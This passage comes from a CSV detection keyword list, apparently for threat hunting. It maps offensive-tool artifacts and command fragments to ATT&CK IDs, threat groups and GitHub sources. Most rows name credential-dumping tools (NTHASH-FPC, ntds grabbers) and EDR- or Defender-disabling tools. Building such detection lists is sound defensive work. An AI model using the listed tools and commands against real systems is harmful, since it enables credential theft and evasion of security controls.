-v*",".{0,1000}nrf24\-scanner\.py\s\-l\s\-v.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*nrpc.py*",".{0,1000}nrpc\.py.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","0","N/A","N/A","1","10","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" "*NSAKEY/nsa-rules*",".{0,1000}NSAKEY\/nsa\-rules.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "*nsa-rules-master*",".{0,1000}nsa\-rules\-master.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "*nselib/data/passwords.lst*",".{0,1000}nselib\/data\/passwords\.lst.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*NSudo -U:T -ShowWindowMode:Hide*",".{0,1000}NSudo\s\-U\:T\s\-ShowWindowMode\:Hide.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*NT 
AUTHOIRTY\SYSTEM*",".{0,1000}NT\sAUTHOIRTY\\SYSTEM.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*ntcreatethread.x64*",".{0,1000}ntcreatethread\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ntcreatethread.x86*",".{0,1000}ntcreatethread\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*NtCreateUserProcessShellcode*",".{0,1000}NtCreateUserProcessShellcode.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*ntdissector -*",".{0,1000}ntdissector\s\-.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*ntdissector-main*",".{0,1000}ntdissector\-main.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*Ntdll_SusProcess.*",".{0,1000}Ntdll_SusProcess\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*NTDLLReflection-main*",".{0,1000}NTDLLReflection\-main.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*NtdllUnpatcher.cpp*",".{0,1000}NtdllUnpatcher\.cpp.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.dll*",".{0,1000}NtdllUnpatcher\.dll.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" 
"*NtdllUnpatcher.lib*",".{0,1000}NtdllUnpatcher\.lib.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.log*",".{0,1000}NtdllUnpatcher\.log.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.obj*",".{0,1000}NtdllUnpatcher\.obj.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.sln*",".{0,1000}NtdllUnpatcher\.sln.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher_Injector*",".{0,1000}NtdllUnpatcher_Injector.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher-master*",".{0,1000}NtdllUnpatcher\-master.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*ntds/ntds.py*",".{0,1000}ntds\/ntds\.py.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*ntds_grabber.md*",".{0,1000}ntds_grabber\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ntdsdump.exe*",".{0,1000}ntdsdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*NTDSgrab.ps1*",".{0,1000}NTDSgrab\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ntfs-read.py*",".{0,1000}ntfs\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*",".{0,1000}nth\s\-\-text\s5f4dcc3b5aa765d61d8327deb882cf99.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*NTHASH /enumproc *",".{0,1000}NTHASH\s\/enumproc\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - 
T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH /runas *",".{0,1000}NTHASH\s\/runas\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH /runaschild /pid*",".{0,1000}NTHASH\s\/runaschild\s\/pid.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH /runastoken *",".{0,1000}NTHASH\s\/runastoken\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH /runwmi *",".{0,1000}NTHASH\s\/runwmi\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /cryptunprotectdata /binary:*",".{0,1000}NTHASH.{0,1000}\s\/cryptunprotectdata\s\/binary\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /cryptunprotectdata /input:*",".{0,1000}NTHASH.{0,1000}\s\/cryptunprotectdata\s\/input\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /dumpsam*",".{0,1000}NTHASH.{0,1000}\s\/dumpsam.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /enumcred*",".{0,1000}NTHASH.{0,1000}\s\/enumcred.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - 
T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /enumvault*",".{0,1000}NTHASH.{0,1000}\s\/enumvault.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /getlsakeys*",".{0,1000}NTHASH.{0,1000}\s\/getlsakeys.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /wlansvc /binary:*",".{0,1000}NTHASH.{0,1000}\s\/wlansvc\s\/binary\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH-win32.exe*",".{0,1000}NTHASH\-win32\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 
- TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH-win64.exe*",".{0,1000}NTHASH\-win64\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*ntlm.py *",".{0,1000}ntlm\.py\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ntlm_info_enumeration.*",".{0,1000}ntlm_info_enumeration\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NTLMChallengeBase64*",".{0,1000}NTLMChallengeBase64.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 
- Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*NTLMChallengeBase64*",".{0,1000}NTLMChallengeBase64.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ntlm-info.py*",".{0,1000}ntlm\-info\.py.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and 
attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*NTLMInjector.ps1*",".{0,1000}NTLMInjector\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*ntlmquic.*",".{0,1000}ntlmquic\..{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*ntlmquic-go*",".{0,1000}ntlmquic\-go.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*ntlmquic-master*",".{0,1000}ntlmquic\-master.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*ntlmrecon *",".{0,1000}ntlmrecon\s.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
